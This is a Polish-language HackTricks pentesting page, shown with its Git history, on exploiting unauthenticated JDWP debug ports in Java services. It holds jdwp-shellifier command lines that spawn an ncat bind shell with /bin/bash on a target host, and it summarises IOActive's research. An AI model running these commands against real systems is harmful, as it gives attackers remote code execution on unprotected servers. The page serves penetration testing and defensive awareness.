hacktricks/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md

87 lines
6.8 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# Testowanie penetracyjne JDWP - Java Debug Wire Protocol
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:42:55 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 01:46:25 +00:00
## Wykorzystywanie
2024-02-11 01:46:25 +00:00
Wykorzystanie JDWP opiera się na **braku uwierzytelniania i szyfrowania protokołu**. Zazwyczaj znajduje się na **porcie 8000**, ale możliwe są inne porty. Pierwsze połączenie jest nawiązywane poprzez wysłanie "JDWP-Handshake" do docelowego portu. Jeśli usługa JDWP jest aktywna, odpowiada tym samym ciągiem znaków, potwierdzając swoją obecność. Ten handshake działa jako metoda identyfikacji usług JDWP w sieci.
2024-02-11 01:46:25 +00:00
Jeśli chodzi o identyfikację procesu, wyszukiwanie ciągu znaków "jdwk" w procesach Java może wskazywać na aktywną sesję JDWP.
2024-02-11 01:46:25 +00:00
Narzędziem, które warto użyć, jest [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). Można go używać z różnymi parametrami:
```bash
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
```
2024-02-11 01:46:25 +00:00
Zauważyłem, że użycie `--break-on 'java.lang.String.indexOf'` sprawia, że exploit jest bardziej **stabilny**. Jeśli masz możliwość przesłania backdooru na host i wykonania go zamiast wykonania polecenia, exploit będzie jeszcze bardziej stabilny.
2024-02-11 01:46:25 +00:00
## Więcej szczegółów
2024-02-11 01:46:25 +00:00
**To jest podsumowanie [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Sprawdź to, aby uzyskać więcej informacji.
2024-02-11 01:46:25 +00:00
1. **Przegląd JDWP**:
- Jest to pakietowy protokół binarny sieciowy, głównie synchroniczny.
- Brak uwierzytelniania i szyfrowania sprawia, że jest podatny na ataki w przypadku wystawienia na nieprzyjazne sieci.
2024-02-11 01:46:25 +00:00
2. **Handshake JDWP**:
- Prosty proces handshake'u jest używany do inicjowania komunikacji. Pomiędzy Debuggerem (klientem) a Debuggee (serwerem) wymieniany jest 14-znakowy ciąg ASCII "JDWP-Handshake".
2024-02-11 01:46:25 +00:00
3. **Komunikacja JDWP**:
- Wiadomości mają prostą strukturę z polami takimi jak Długość, Identyfikator, Flaga i ZestawPolecenie.
- Wartości ZestawPolecenie mieszczą się w zakresie od 0x40 do 0x80, reprezentują różne akcje i zdarzenia.
2024-02-11 01:46:25 +00:00
4. **Eksploatacja**:
- JDWP umożliwia ładowanie i wywoływanie dowolnych klas i kodu bajtowego, co stwarza ryzyko bezpieczeństwa.
- W artykule opisano proces eksploatacji w pięciu krokach, obejmujący pobieranie odwołań do środowiska wykonawczego Javy, ustawianie punktów przerwania i wywoływanie metod.
2024-02-11 01:46:25 +00:00
5. **Eksploatacja w życiu codziennym**:
- Pomimo potencjalnych zabezpieczeń zapory sieciowej, usługi JDWP są wykrywalne i podatne na eksploatację w rzeczywistych scenariuszach, jak pokazują wyszukiwania na platformach takich jak ShodanHQ i GitHub.
- Skrypt eksploatacyjny został przetestowany na różnych wersjach JDK i jest niezależny od platformy, oferując niezawodne zdalne wykonanie kodu (RCE).
2024-02-11 01:46:25 +00:00
6. **Konsekwencje dla bezpieczeństwa**:
- Obecność otwartych usług JDWP w Internecie podkreśla potrzebę regularnych przeglądów bezpieczeństwa, wyłączania funkcji debugowania w produkcji i odpowiedniej konfiguracji zapory sieciowej.
2024-02-11 01:46:25 +00:00
### **Odnośniki:**
2024-02-04 10:58:49 +00:00
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
* [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
* http://www.secdev.org/projects/scapy(no longer active)
* [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
* http://www.hsc-news.com/archives/2013/000109.html (no longer active)
* [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
* https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
* [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
2022-04-28 16:01:33 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2024-01-03 10:42:55 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi trikami hakerskimi, przesyłając PR do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>